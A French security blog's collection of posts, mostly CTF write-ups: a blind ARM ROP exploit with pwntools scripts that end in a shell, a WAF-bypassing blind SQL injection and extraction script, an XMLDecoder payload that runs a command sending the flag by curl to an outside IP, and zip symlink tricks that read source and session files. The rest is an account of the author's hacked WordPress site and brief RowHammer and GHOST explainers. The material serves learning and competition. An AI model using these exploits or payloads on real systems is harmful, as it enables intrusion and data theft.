Daily Security - L'actualité commentée

Blind ROP ARM - ECSC Préquals 2019 - Secure Vault - Writeup

2019-05-22T18:00:00+02:00

Dans le cadre des préqualifications de l'ECSC, j'ai eu l'occasion de tester un challenge original dans la catégorie pwn : le challenge Secure Vault.

La mention "aucun binaire n'est fourni avec ce challenge" nous indique que le challenge va être intéressant !

Pour commencer, on se connecte au challenge :

root@Miaou:/# nc challenges.ecsc-teamfrance.fr 4006
Welcome. Please enter your password:
miaou
Wrong password. Bye.

Le binaire a l'air simple, on nous demande un mot de passe : s'il est faux, il affiche "Wrong password" et se ferme.

On essaie donc d'overflow la seule entrée disponible :

root@Miaou:/# nc challenges.ecsc-teamfrance.fr 4006 < <(python -c "print 'a'*80")
Welcome. Please enter your password:

Pas de retour, le binaire a planté !

Nous n'avons pas le binaire, nous allons donc devoir l'exploiter en blind (BROP ARM FTW).

Hypothèse : Les challenges précédents étaient en ARM, on peut donc supposer que celui-ci sera en ARM aussi.

On commence par faire un bruteforce byte à byte pour obtenir le canary/ebp/eip ou PC.

Méthode sur mon article sur le stack canary :

from pwn import *

leak = ""
while len(leak) < 4:
    for i in xrange(256):
        try:
            p=remote("challenges.ecsc-teamfrance.fr",4006)
            hex_byte = chr(i)
            buf = "A"*56 + leak + hex_byte
            p.write(buf)
            dumb=p.recvuntil("\n")
            resp=p.recv(5000)
            if 'Bye' in resp:
                leak += hex_byte
                print("[*] byte : %r" % hex_byte)
                break
            if(i==255):
                raise ValueError('Hum :(')
        except:
            pass

print leak
#Note : CTRL+C quand ça bloque

Condition vraie : "Bye" ;
Condition fausse : pas de retour.

Suite à ce bruteforce, on obtient seulement 4 bytes : une adresse 0x10634.

On peut en déduire trois choses :

C'est bien de l'ARM ;
Il n'y a pas de canary (youhou, ça aurait été pénible comme ça redémarre à chaque fois) ;
Pas de PIE, la valeur ne change pas, de plus elle est adressée sur les adresses ARM habituelles.

Méthodologie

A partir de là, on va tenter le schéma classique de BROP :

On cherche un stop gadget (gadget qui renvoie une chaine différente ou qui fait attendre le programme) ;
On cherche un gadget pour load nos registres ;
On cherche la PLT de puts (il n'y pas de format utilisé dans le binaire donc printf est optimisée en puts par le binaire) pour leak le binaire ;
On leak la libc à partir des adresses de la GOT ;
On calcule l'offset entre puts et system (et /bin/sh) ;
On fait un ret2libc classique.

Stop gadget

Le stop gadget se trouve facilement. On bruteforce autour de notre PC actuel et on trouve une chaine qui renvoie "Welcome back" à 0x1065c.

Ce sera notre stop gadget : si on reçoit cette chaine, on sait qu'on a bien jump sur 0x1065c.

from pwn import *
for i in range(0x400):
    try:
        p=remote("challenges.ecsc-teamfrance.fr",4006)
        p.send('a'*56+p32(0x10634+i))
        print i
        p.recv(5000)
        p.recv(5000)
        p.recv(5000)
    except:
        pass

Gadget pour contrôler les registres

Maintenant, le gadget pour les registres.

En ARM, il y a un gadget très connu, qui fait : LDMFD SP! {R4-R10,LR};BX LR.

Autrement dit, il va pop nos valeurs de la stack dans les registres R4,R5,R6,R7,R8,R9,R10 et LR puis jump sur LR.

Avec ce gadget, on contrôle R4 jusqu'à R10.

Ce gadget se situe dans la __libc_csu_init (juste après le main). Il sera toujours présent dans nos binaires.

Pour en être sûr, on prend le binaire d'un autre challenge du même CTF : armory et on obtient :

On y trouve aussi deux autres gadgets intéressants, un gadget pour contrôler R0, R1 et R2 suivi d'un jump sur r3 (toujours dans __libc_csu_init) à l'adresse 0x10610 : Ainsi qu'un dans .term_proc pour contrôler r3 (situé de façon relative à __libc_csu_init (l'offset ne change pas)) à l'adresse 0x10644 : Avec ces trois gadgets, on contrôle tous nos registres et on peut jump où on veut.

Bien sur, dans le challenge, l'adresse ne sera pas la même, il faudra utiliser le stop gadget pour trouver la bonne adresse.

Il suffit juste de faire une boucle qui prend en compte le pop de 7 registres (R4-R10) :

from pwn import *

for i in range(0,0x400,4):
    try:
        p=remote("challenges.ecsc-teamfrance.fr",4006)
        p.send('a'*56+p32(0x10600+i)+p32(0)*7+p32(0x1065c))
        dump=p.recvuntil("\n")
        result=p.recv(5000)
        if("Welcome back" in result):
            print i
            print result
        p.close()
    except:
        pass

Dès que le binaire nous renvoie "Welcome back", on sait qu'on a atteint le gadget qui nous intéresse.

[+] Opening connection to challenges.ecsc-teamfrance.fr on port 4006: Done
812
Welcome back!

A partir de là, c'est déjà le game over. On contrôle tous nos registres, on cherche puts avec un r0 égal à une adresse valide (j'ai pris l'adresse du gadget LDMFD SP! {R4-R10,LR} récupérée au tout début) et on applique la même méthode.

from pwn import *

for i in range(0,0x100,4):
    try:
        p=remote("challenges.ecsc-teamfrance.fr",4006)
        r0=0x1092c
        r1=0
        r2=0
        p.send('a'*56+p32(0x1092c)+p32(0)*3+p32(r0)+p32(r1)+p32(r2)+p32(0)+p32(0x1092c+0x18 )+p32(0x10604+i)+p32(0x1092c-0x1c))
        yolo=p.recvuntil("\n")
        result=p.recv(5000)
        if("\xf0G\xbd\xe8" in result):
            print "\n\n\n\nFound at "+str(i)+"\n\n\n\n"
            print result
        p.close()
    except:
        p.close()
        pass

Si on trouve des caractères hexadécimaux dans l'output correspondant à l'instruction du gadget, on sait que c'est un call puts.

[+] Opening connection to challenges.ecsc-teamfrance.fr on port 4006: Done

Found at 24

\xf0G\xbd\xe8

On peut maintenant leak tout le binaire mais au final, la seule chose qui nous intéresse c'est la GOT.

Celle-ci a une adresse ± fixe vers 0x21000±0x40.

from pwn import *

i=0
base_got=0x21000
leak_got=""
while i<0x40:
    p=remote("challenges.ecsc-teamfrance.fr",4006)
    r0=base_got+i
    r1=0
    r2=0
    p.send('a'*56+p32(0x1092c)+p32(0)*3+p32(r0)+p32(r1)+p32(r2)+p32(0)+p32(0x1092c+0x18 )+p32(0x10604+24)+p32(0x1092c-0x1c))
    dumb=p.recvuntil("\n")
    a=p.recv(5000)[:-1]
    if(len(a)==0):
        i+=1
        leak_got+='\x00'
    i+=len(a)
    leak_got+=a
    p.close()

>>> leak_got[4:]
'X\xe9\x7f\xf6\xfcE~\xf6\x94kn\xf6\xe8\xc8m\xf6\x90Zt\xf6\x8c\xc0m\xf6\xa4\xedp\xf6\x90ct\xf6|\xe9m\xf6tUi\xf6$Tq\xf6\xc0\xe5p\xf6\xf0\x04\x01\x00\xf0\x04\x01\x00\x08tl\xf6d\xbam\xf6\x80\x8eo\xf6\xf0\x04\x01'

Libc + ret2libc

La triche : ici, j'ai pris la libc de armory en supposant que c'était la même que sur le challenge, ça m'a évité d'avoir à tout leak à partir des adresses de la GOT (surtout avec la latence sur le serveur).

Il y a deux vraies méthodes pour leak la libc :

On utilise la même méthode que pour GOT en l'adaptant un peu (printf va couper sur tous les "badchars" comme par exemple les sauts à la ligne) et on cherche la version de la libc dans les commentaires à la fin de la libc ;
On utilise DynELF (merci au créateur du challenge "\J" pour la méthode) qui permet de résoudre les fonctions de la libc automatiquement avec juste une fonction de leak et une adresse du binaire. Dans ma méthode, j'utilise printf pour leak et donc DynELF ne fonctionne pas. Il faudrait trouver un moyen de leak avec une autre fonction.

Avec la libc et nos adresses de la GOT, il ne nous reste plus qu'à calculer la différence entre puts et system, et puts et /bin/sh puis à set r0 à l'adresse de /bin/sh et r3 à system (on jump sur r3 à la fin de notre séquence de gadgets).

Pour faire ça, on teste toutes les adresses récupérées jusqu'à trouver la valeur de la GOT de puts et on utilise pwntools pour calculer automatiquement l'adresse de system et /bin/sh.

from pwn import *
libc=ELF('libc.so')

leak_got='X\xe9\x7f\xf6\xfcE~\xf6\x94kn\xf6\xe8\xc8m\xf6\x90Zt\xf6\x8c\xc0m\xf6\xa4\xedp\xf6\x90ct\xf6|\xe9m\xf6tUi\xf6$Tq\xf6\xc0\xe5p\xf6\xf0\x04\x01'
b=[]
for i in range(0,len(leak_got),4):
    b+=[leak_got[i:i+4]]

for leak in b:
    p=remote("challenges.ecsc-teamfrance.fr",4006)
    leak_system =u32(leak)-libc.symbols['puts']+ libc.symbols['system']
    leak_binsh =u32(leak)-libc.symbols['puts']+ next(libc.search('/bin/sh\x00'))
    r0=leak_binsh
    r1=0
    r2=0
    p.send('a'*56+p32(0x1092c)+p32(0)*3+p32(r0)+p32(r1)+p32(r2)+p32(0)+p32(0x1092c+0x18 )+p32(leak_system)+p32(0x1092c-0x1c))
    p.interactive()

Et paf, on obtient un shell.

[x] Opening connection to challenges.ecsc-teamfrance.fr on port 4006
[x] Opening connection to challenges.ecsc-teamfrance.fr on port 4006: Trying 51.91.16.154
[+] Opening connection to challenges.ecsc-teamfrance.fr on port 4006: Done
[*] Switching to interactive mode
Welcome. Please enter your password:
id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)

Retrospective

Le challenge était vraiment super intéressant. Il ressemblait comme deux gouttes d'eaux à un BROP intel x64 avec le one gadget qui load tous les registres mais ça change de voir un peu d'ARM !

L'année prochaine on veut du MIPS !

Voilà, c’est déjà terminé, n’hésitez pas à suivre mon Twitter pour avoir des news sur le site et mon point de vue sur l’actualité de la sécurité informatique.

Geluchat.

Nuit du Hack Quals 2016 – SpaceSec – Write-Up

2016-04-04T09:08:00+02:00

Le week-end dernier, j'ai participé aux qualifications de la Nuit du Hack 2016 avec l'équipe khack40. Les 10 premières équipes recevaient des places gratuites pour la Nuit du Hack (début juillet) ainsi que la possibilité de participer au CTF privé lors de l’événement , et comme l'année dernière nous n'avons malheureusement pas réussi à nous qualifier.

Nous avons tout de même atteint la 11ème place (la place ingrate) ce qui est mieux que l'année précédente où après un rush infernal des autres équipes pendant la nuit nous avions finalement fini 28ème.

Comme chaque année le guessing était présent (la stéganographie principalement) mais cela ne m'a pas empêché de trouver des épreuves intéressantes comme l'épreuve de web que je vais vous présenter.

SpaceSec 300 pts

La page est basique, un bon vieux challenge fait avec Bootstrap.

On remarque que tous les articles proposés contiennent les mêmes descriptions, seuls les numéros de CVE et les auteurs semblent changer.

En cliquant sur Older Post on obtient une adresse du type:

http://spacesec.quals.nuitduhack.com/index.php?offset=6

Si on change un peu l'offset on obtient :

Oh un utilisateur qui s'appelle Flag...

Soyons fou, tentons la SQL injection directement :

http://spacesec.quals.nuitduhack.com/index.php?offset=6'

Bon, ça ne marche pas très bien, voyons voir si l'on peut au moins déclencher une erreur SQL:

http://spacesec.quals.nuitduhack.com/index.php?offset=-1

Yeah, une belle erreur SQL !

En résumé, nous avons :

Un utilisateur Flag
Un offset modifiable d'une requête SQL
Une erreur SQL
Un affichage du numéro de l'erreur SQL
Un WAF maison (un pare-feu pour le Web)

Après un petit temps de réflexion on en vient à deux remarques :

Le WAF se bypass facilement à coups de %0a pour les espaces et de changements de casse (SeLEcT par exemple)
On ne peut pas faire d'UNION, la requête contient donc probablement un order by.

La requête est donc dans le genre:

SELECT * FROM latable ORDER BY rand() LIMIT 3 OFFSET $_GET['offset'];

Quelques recherches sur le web nous permettent de trouver un bypass assez sympathique à coup de procédure SQL.

L'article en question nous parle de l'utilisation de la procédure ANALYSE qui est présente dans mysql de base.

C'est presque trop beau pour être vrai, et... en effet ça l'est !

http://spacesec.quals.nuitduhack.com/index.php?offset=1%a0PRoCEDuRE%a0aNaLYSE%0a(eXtractValue%0a(0,1),1)--

La page ne nous ressort que le numéro de l'erreur...

Alors, que faire pour contourner ce problème?

Eh bien, la réponse est simple, il suffit juste de faire une time-based injection !

Et... ça ne fonctionne pas, l'auteur du challenge à décidé de bloquer les fonctions sleep et benchmark...

Qu'à cela ne tienne, on passe donc par des heavy query !

On récupère plein de fois information_schema pour faire ramer la page et... information_schema est bloqué aussi ?!

Je décide donc d'aller me coucher sur un échec. Ce fut à la fois une bonne et une mauvaise idée :

J'ai trouvé la réponse dans la nuit
Je n'ai pas dormi avant de l'avoir trouvée

De retour le lendemain ~~matin~~ après-midi, je décide de tenter ma trouvaille :

Une SQL injection Boolean Based Into Double Error Based (oui, j'ai inventé le nom, mais ça en jette non?).

J'explique, on va tenter de faire passer une condition dans notre extractvalue, si cette condition est vraie on lui fait faire un convert(9990130101,date), la date étant complétement fausse la fonction plante et retourne NULL, sinon, on retourne 1.

Ce qu'il faut savoir, c'est que la procédure ANALYSE n'aime pas avoir un paramètre à NULL, elle crash donc un message d'erreur 1108 qui signifie "Message: Incorrect parameters to procedure '%s'"

En revanche si on lui envoie 1 en premier paramètre elle nous renvoie juste une erreur 1105 : "Message: Unknown error"

On peut tester avec:

http://spacesec.quals.nuitduhack.com/index.php?offset=1 PRoCEDuRE aNaLYSE ( (selEct exTractvalue (rAnd (),coNcat (0x3a, (case when (substring(1,1,1)=1) then convert(9990130101,date) else 1 end)))),1)--

J'ai remplacé les %0a par des espaces pour un souci de compréhension.

http://spacesec.quals.nuitduhack.com/index.php?offset=1 PRoCEDuRE aNaLYSE ( (selEct exTractvalue (rAnd (),coNcat (0x3a, (case when (substring(1,1,1)!=1) then convert(9990130101,date) else 1 end)))),1)--

A partir de là on peut tout simplement récupérer le mot de passe de l'utilisateur Flag dans la base de données.

Je vous épargne le temps afin de trouver la bonne table avec les bonnes colonnes (totalement au hasard).

Au final, on trouve une table users avec les colonnes id, username et password.

Ni une, ni deux, on code un petit script qui récupère tout ça.

Ayant une petite dent contre la programmation, je vous présente mon modeste script qui n'est pas optimisé mais qui fait le taf' :

#!/usr/bin/env python2
# -*- coding: utf8 -*-
import requests,time

cookie = {'PHPSESSID' : 'cl4r4m0rg4ne1sg00dbUt1pr3f3r3L3xiB3ll3'}

passwd=""
char=48

length=len(passwd)+1

while char!=127:
    forge="http://spacesec.quals.nuitduhack.com/index.php?offset=1%a0PRoCEDuRE%a0aNaLYSE%0a(%0a(selEct%0aexTractvalue%0a(rAnd%0a(),coNcat%0a(0x3a,%0a(case%0awhen%0a(substring(%0a(selEct%0apassword%0afRom%0ausers%0awHere%0ausername%0aliKe%0a0x464c4147),"+str(length)+",1)=char("+str(char)+"))%0athen%0aconvert(9990130101,date)%0aelse%0a1%0aend)))),1)--"
    resultat=requests.get(forge,cookies=cookie).content
    print forge
    time.sleep(0.5)
    if resultat.find('1108')!=-1 :
        passwd+=str(chr(char))
        char=47
        length+=1
        print passwd
    char+=1

print "[+] Le password est: "+str(passwd)

On obtient un mot de passe qui ressemble à un hash de 128 caractères en majuscule.

La partie rigolote de l'histoire est que j'ai cherché pendant une bonne demi-heure quoi en faire et au final Mastho, un membre de mon équipe, l'a valider en 5 secondes en m'expliquant qu'il avait juste mis le hash en minuscule...

En définitive, une épreuve bien marrante avec des protections assez funs.

Voilà, c’est déjà terminé, n’hésitez pas à rejoindre mon Twitter pour avoir des news sur le site et mon point de vue sur l’actualité de la sécurité informatique.

Geluchat.

HackIm 2016 - Web100 / Web400 - Write-Up

2016-02-03T15:06:00+01:00

J'ai dernièrement participé avec mon équipe au HackIm, un CTF organisé par la NullCon.

Malgré une organisation catastrophique ainsi que des épreuves de type "devinette", ce CTF nous a proposé des challenges très intéressants dans les catégories Web et Exploitation.

Voici donc un write-up de deux épreuves web que j'ai trouvées enrichissantes.

Web 100 - SignServer 100 pts

Document signature is so hot right now! SignServer provides you with the most advanced solution to sign and verify your documents. We support any document types and provide you with a unique, ultra-secure signature. http://54.174.72.79:9000

Arrivé à l'adresse indiquée nous avons accès à deux services, l'un qui nous permet de signer et l'autre de vérifier une signature.

En envoyant un fichier au hasard (on évite celui qui contient nos mots de passe), on obtient:

<java version="1.8.0_72-internal" class="java.beans.XMLDecoder">
    <object class="models.CTFSignature" id="CTFSignature0">
        <void class="models.CTFSignature" method="getField">
            <string>hash</string>
            <void method="set">
                <object idref="CTFSignature0" />
                <string>86f7e437faa5a7fce15d1ddcb9eaeaea377667b8</string>
            </void>
        </void>
        <void class="models.CTFSignature" method="getField">
            <string>sig</string>
            <void method="set">
                <object idref="CTFSignature0" />
                <string>902d4de8fb705154a1a0107c227b9d510523fa17</string>
            </void>
        </void>
    </object>
</java>

On peut voir que l'objet a été sérialisé en XML et passe dans la moulinette "XML Decoder".

Après quelques recherches sur cette méthode, on apprend qu'elle peut prendre plusieurs objets en même temps.

La méthode ProcessBuilder sur package java.lang nous permet de faire appel à des commandes systèmes.

On envoie donc avec l'option signature cochée :

<java version="1.8.0_72-internal" class="java.beans.XMLDecoder">
    <object class="models.CTFSignature" id="CTFSignature0">
        <void class="models.CTFSignature" method="getField">
            <string>hash</string>
            <void method="set">
                <object idref="CTFSignature0" />
                <string>86f7e437faa5a7fce15d1ddcb9eaeaea377667b8</string>
            </void>
        </void>
        <void class="models.CTFSignature" method="getField">
            <string>sig</string>
            <void method="set">
                <object idref="CTFSignature0" />
                <string>902d4de8fb705154a1a0107c227b9d510523fa17</string>
            </void>
        </void>
    </object>
    <object class="java.lang.ProcessBuilder">
        <array class="java.lang.String" length="3" >
            <void index="0"> 
                <string>/bin/sh</string>                                
            </void>     
            <void index="1"> 
                <string>-c</string> 
            </void>
            <void index="2"> 
                <string>/bin/cat flag | /usr/bin/tee /tmp/res;/usr/bin/curl 195.154.70.52:4444/1 --data "@/tmp/res"</string>                                
            </void>             
        </array>                    
        <void method="start"/>
    </object>
</java>

En essayant de créer des commandes j'ai rencontré un problème avec les redirections ('\<','>'), c'est pourquoi ma commande pour extraire le flag est plus complexe qu'un simple reverse shell.

nc -lvp 4444
listening on [any] 4444 ...
connect to [195.154.70.52] from ec2...
flag{ser1l1azati0n_in_CTF_is_fUN}

Web 400 - smashthestate 400 pts

This beautiful website for testing zip files contains a replica of a vulnerability found in a well known bug bounty site. Log in with rob:smashthestate then exploit the vulnerability to gain access to the 'admin' account and the flag. Automated tools and bruteforcing will not help you solve this challenge. http://54.152.101.3

En arrivant sur le challenge, on voit un formulaire de connexion ainsi qu'une page qui nous propose de générer un code envoyé par email à l'administrateur.

Après connexion avec l'utilisateur indiqué rob:smashthestate, on se trouve face à un formulaire d'upload qui prend une archive zip.

On envoie donc un fichier zipé au hasard et on observe que le fichier a été dezippé puis affiché.

Les archives zip sont connues pour être faillibles aux attaques par symlink, on peut donc récupérer le code source de la page :

ln -s /var/www/html/index.php link
zip –symlinks test.zip link

Ce qui donne:

$FAKE_DATABASE = array (
    "rob" => "60df0ab1a78fd0d95a4cfa4b0854931b", // smashthestate
    "admin" => "8e11a50ef762f924d7af9995889873e4",
);
$page = $_GET['page'];

switch ($page) {
    case "login":
        echo "trying to log in";
        $user = $_POST['user'];
        $pass = $_POST['pass'];
        if ($FAKE_DATABASE[$user] === md5($pass)) {
            session_start();
            session_regenerate_id(True);
            $_SESSION['user'] = $user;
            header("Location: ?page=upload");
            die();
        }
        else {
            header("Location: ?");
        }
        break;
    case "admin_login_help":
        session_start();
        if(!isset($_SESSION['login_code']) ){
            $_SESSION['login_code'] = bin2hex(openssl_random_pseudo_bytes(18));
            echo "A login code has been emailed to the administrator. Once you have recieved it, please click here\n";
        }
        else {
            echo "There is already an active login code for this session";
        }
        break;
    case "code_submit":
        session_start();
        $code = $_POST['code'];
        if (isset($code) && isset($_SESSION['login_code'])) {
            if ($code === $_SESSION['login_code'] ){
                echo "Flag: ";
                passthru("sudo /bin/cat /var/www/html/flag");
            }
            else {
                echo "Invalid code";
            }
        }
        else {
            echo "Please input the login code:";
        }
        break;
    case "upload":
        session_start();
        if (!isset($_SESSION['user'])) {
            header("Location: ?");
        }
        else {
            echo "Welcome ".$_SESSION['user'] ." Logout";
            echo "Use this form to verify zip integrity";
        }
        break;
    case "process_upload":
        session_start();
        if (isset($_SESSION['user']) && $_FILES['zipfile']['name']) {


            if ($_FILES['zipfile']['size'] > 16000) {
                echo "File above max size of 10kb";
                echo "back";
                break;
            }
            $tmp_file = '/var/www/html/tmp/upload_'.session_id();

            # ZipArchive may not be available
           # $zip = new ZipArchive;
           # $zip->open($_FILES['zipfile']['name']);
           # $zip->extractTo($tmp_file);
           exec('unzip -o '.$_FILES['zipfile']['tmp_name']. ' -d '.$tmp_file);
            echo "Zip contents: ";
            passthru("cat $tmp_file/* 2>&1");
            exec("rm -rf $tmp_file");
            echo "back";
        }
        break;
    default:
        echo "<html><form action='?page=login' method='POST'>Username: <input name='user'/><br/>Password: <input type='password' name='pass'/><br/><input type='submit' value='Log in'/></form><a href='?page=admin_login_help'>Admin login help</a></html>";
        break;
}

Dans la page, le flag est affiché si notre code généré correspond à la bonne valeur.

Grâce à la faille précédente on récupère notre cookie de session via les commandes :

ln -s /var/lib/php5/sess_71kl18mrbua52acd91jceqmrs4 link
zip –-symlinks test.zip link

Une fois le code affiché il ne reste plus qu'à le mettre dans le formulaire de validation qui nous donne le flag :

Flag: 8e11a50ef762f924d7af9995889873e4

Voilà, c’est déjà terminé, n’hésitez pas à rejoindre mon Twitter pour avoir des news sur le site et mon point de vue sur l’actualité de la sécurité informatique.

Geluchat.

Comment pirater un WordPress, ou pas...

2015-05-12T13:04:00+02:00

Je ne sais pas si vous l'avez remarqué, mais il y a une semaine mon site était indisponible en raison d'une maintenance.

Tout a débuté le 1er Mai, je me rends comme chaque jour sur mon site pour les mises à jour quotidiennes et c'est alors qu'apparaît une belle deface (modification de la page d'accueil du site) faite par un groupe de h4x0r avec un message dans un anglais approximatif "Ure security is bad, go patch, blabla" ainsi qu'une petite mention disant que payer un hébergeur ne veut pas dire que l'on est en sécurité.

Sur le coup, j'imagine que l'un de mes plugins n'a pas été mis à jour et j'accuse le coup en me disant qu'après tout, ce n'est qu'un Wordpress.

Après une analyse un peu plus approfondie des logs j'en viens à une conclusion étrange : il semblerait qu'ils se soient tous simplement connectés avec mon compte administrateur.

Hop, je lance un scan antivirus sur mon PC, rien n'est détecté, même pas le moindre logiciel espion, pas un faux positif, rien.

J'en viens à penser que c'est peut-être une 0day mais le souvenir de la tête de mort sur la deface ainsi que les pseudos du type xXxD4rkAng3lxXx me rappellent vite que la faille ne doit pas être bien compliquée.

Je reçois plusieurs messages via IRC et Skype, un de mes amis m'a même conseillé en rigolant de lancer un armitage auto_pwn, je décide de rester plus calme en lançant un scan Nikto classique ainsi qu'une analyse des plugins Wordpress, peut être que quelque chose m'aurait échappé ...

C'est alors qu'une personne fort sympathique m'a contacté sur IRC pour me souhaiter bonne chance pour la remise en place de mon site. En discutant avec celle-ci, j'apprends que le port 31337 est ouvert sur le serveur qui m'héberge.

J'en viens alors à deux hypothèses remplies de questions :

Ce shell vient-il de mon site?
S'il n'est pas à moi que fait-il là ? Et quels sont ses droits sur le serveur ?

Afin de satisfaire ma curiosité je décide de m'y connecter, sachant que mon hébergeur mutualisé est lié au domaine snip.snap (ce n'est pas le domaine réel), je lance un petit :

$ nc snip.snap 31337.

Je vérifie l'id, il correspond au compte "touspour".

Et là, descente en enfer, encore une fois les mêmes questions : "Quels sont ses droits sur le serveur ? Que fait-il là ?".

Pour la deuxième question il faudra que je demande au support de mon hébergeur, je décide donc de chercher la réponse à la première question.

Quels sont ses droits sur le serveur?

Quelques commandes me permettent de voir que je ne suis de toute évidence pas doté de droits root, ouf.

Grâce à un affichage de /etc/passwd je vois qu'un compte est créé pour chaque nouvel utilisateur.

Niveau sécurité, ça n'a pas l'air au top niveau mais au moins je ne peux pas me déplacer dans les dossiers des autres personnes.

Enfin, ça, c'était avant le drame ...

Toujours dans le but final de découvrir comment mon site a pu être piraté par notre chère Dr34mT34m, je lance à tout hasard un listing des répertoires via le shell sur mon répertoire à priori privé :

Et là, horreur, on ne peut pas se déplacer dans les répertoires mais on peut les lister.

Je rentre la commande :

$ cat /home/dailysec/public_html/wp-config.php

Des gouttes de sueurs commencent à perler sur mon front quand je vois apparaître :

A partir de ce moment, je choisis de me connecter sur le port 3306 (MySQL) et un beau OPEN se peint devant mes yeux.

L'attaque devient alors claire:

On se connecte sur le port 31337
On récupère les logins MySQL
On se connecte et on modifie le mot de passe administrateur WordPress
On peut upload un shell dans les templates ou juste via l'upload
Enjoy your shell ...

Que fait-il là?

Bonne question, pour y répondre j'ai dû batailler avec le support de Pulseheberg qui m'a envoyé balader :

Etant une personne très patiente et dotée d'un sens du sarcasme assez poussé, je lui ai bien sûr répondu :

"Étonnamment quand je fais un 'nc snip.snap 31337' j'obtiens un shell console. Vos audits de sécurités sont-ils sélectifs dans le genre "on laisse le port 31337 ouvert, ça fait classe" ? Je dis bien sûr tout ça avec le plus grand des humours mais ça me reste tout de même en travers de la gorge ..."

Le tout accompagné des screenshots présents dans l'article.

Ma réponse n'a pas dû plaire au "Développeur en chef" puisque c'est une autre personne qui m'a répondu que la faille était "patchée" et "bloquée niveau firewall".

Je cherche à en savoir plus sur l'origine de ce shell et j'obtiens une réponse pour le moins originale :

"Le port avait été ouvert lors d'une très ancienne intervention et n'avait pas été fermé correctement."

De toute évidence ma réponse au "Développeur en chef" avait tapé dans le mille : les pseudos audits de sécurité quotidiens n'avaient pas vu le port 31337 ouvert.

Pire, le firewall semblait être un firewall à DROP.

Pour ceux qui ne connaissent pas les firewalls à DROP sachez que cela correspond grossièrement à ajouter des règles interdisant d'ouvrir tel ou tel port, ce qui n'est absolument pas sécurisé.

Retour d'expérience chez PulseHeberg

Avant d'en venir à des conclusions hâtives, je souhaiterais vous éclairer sur les points essentiels de mon ressenti sur "l'expérience Pulseheberg".

Lors de mon inscription, j'ai commandé un VPS afin de gérer moi-même la sécurité du serveur.

La livraison s'est déroulée sans encombre. Par contre, mes 8 Go de RAM allouée ne semblaient pas correspondre au résultat fourni par la commande "free" qui m'indiquait 8To.

J'ai appris plus tard qu'ils avaient mal configuré la VM.

Je me demande ce que cela aurait fait si j'avais mis à profit ces 8To, sûrement une coupure générale de toutes les VM du parc.

Au bout d'un mois, le serveur ne répondait plus, même via ssh, en tant "qu'administrateur de VPS du weekend" et avec ma confiance en moi légendaire, j'ai pensé à une erreur de ma part, personne n'est infaillible.

J'ai donc totalement réinstallé le serveur et le problème a persisté. Après trois tickets au support, il m'a semblé que le problème les dépassait.

J'avais déjà avancé de l'argent sur leur service, il me restait aux alentours de 40 euros, c'est pourquoi j'ai décidé de changer de prestation vers un hébergement mutualisé, la suite vous la connaissez...

Si je devais choisir un point positif chez PulseHeberg cela serait les tickets au support, auxquels on reçoit une réponse dans un temps record, environ une quinzaine de minutes, j'ai toujours eu l'impression que le support prenait vraiment mon problème à cœur.

Malgré un support à l'écoute ainsi que des prix défiants toute concurrence, leurs compétences gâchent totalement le service.

On comprend bien qu'ils essaient de faire de leur mieux, en revanche, comme vous vous en doutez, je ne vous conseille pas cet hébergeur, sauf si vous ne vous intéressez pas à la sécurité de votre site.

Voilà, c’est déjà terminé, n’hésitez pas à commenter cet article ainsi qu'à rejoindre mon Twitter pour avoir des news sur le site et mon point de vue sur l’actualité de la sécurité informatique.

Geluchat.

BCTF, 0CTF et BackDoorCTF

2015-04-03T21:16:00+02:00

J'ai récemment participé au BCTF, au 0CTF ainsi qu'au BackDoorCTF.

À cette occasion, j'ai appris de nouvelles failles, notamment de la cryptographie, une méthode d'escape de sandbox Java et une autre forme de XXE.

Si vous souhaitez vous renseigner sur ces techniques je vous en fais une petite liste:

Le Bit Flipping: Une manière d'altérer un cookie peu protégé par un chiffrement CBC.
Plus d'informations ici ou encore ici
Le clojure, une sorte de langage natif interprété à l’intérieur de la JVM.
Très utile lors des escapes de sandbox
Les XXE into .docx
En effet, les parsers de .docx sont sensibles au XXE comme le montre le challenge GoldenMac du 0CTF

Voilà, c’est déjà terminé, n’hésitez pas à rejoindre mon Twitter pour avoir des news sur le site et mon point de vue sur l’actualité de la sécurité informatique.
Geluchat.

La vulnérabilité RowHammer

2015-03-17T11:48:00+01:00

Voici déjà une semaine que cette vulnérabilité fait parler d'elle, elle permet une élévation de privilège d'une manière très étonnante.

Le concept

Elle repose sur une erreur de conception matérielle de certaines barrettes de DRAM (Dynamic Random Access Memory).

Il y a dans ces dernières des millions de condensateurs très proches les uns des autres.

Ainsi, lorsque l'on modifie un bit, il y a des chances pour que les condensateurs adjacents soient modifiés, on appelle ça du 'Bit flipping'

Plus précisément, l'exploit fonctionne sur le principe suivant:

On cherche à modifier des bits de la mémoire qui ne nous appartiennent pas.
Pour cela, on utilise une technique dite RowHammer ("Martellement de colonne") qui consiste à lire un bit sur une colonne puis à vider sa cellule et on répète en boucle.

code1a:
     mov (X), %eax  ; Read from address X
     mov (Y), %ebx  ; Read from address Y
     clflush (X)  ; Flush cache for address X
     clflush (Y)  ; Flush cache for address Y
     jmp code1a

Poussé à l’extrême, cela mène à une élévation de privilèges

Mon avis, les conséquences futurs

J'aime beaucoup les failles liées à un vrai défaut technique et matériel de la part du concepteur.

Pour moi, ces vulnérabilités d'un type novateur n'annoncent que les prémisses d'une refonte du concept même des architectures modernes et des matériaux utilisés.

Introduction et présentation de la faille GHOST

2015-02-27T20:04:00+01:00

Cet article sert d'introduction à la partie actualité commentée du site.

Celle-ci sera composée de nouveautés liées aux différentes CVE actuelles ou encore sur des événements de type Capture The Flag qui comporteraient des éléments intéressants.

Ayant manqué la faille GHOST (CVE-2015-0235) qui est apparue pendant la création de ce site, je ne saurais que vous conseiller de lire les différents documents disponibles sur le net.

Pour ceux qui ne connaitraient pas cette faille ou qui ne se seraient pas penchés sur le sujet je vais vous faire une courte description de la faille.

La faille GHOST, qui tient son nom de la fonction gethostbyname(), est présente dans la version 2.2 de glibc et permet de gagner un accès shell à une machine distante.

Il faut savoir que cette faille a été patchée en mai 2013 mais n'a pas été prise en compte par les nouvelles distributions qui n'ont pas associé la mise à jour à un danger.

On peut y compter Centos, Fedora ainsi que Ubuntu.

Elle consiste en l'exploitation d'un Heap Overflow complexe car il permet de réécrire la mémoire uniquement avec des nombres et des points.

Néanmoins, plusieurs exploits ont vu le jour et touchent des programmes importants tels que Apache, Nginx, Mysql ou encore SendMail (EDIT: non exploitable pour ces deux derniers).

Pour plus d'informations, l'excellent PoC de Qualys Security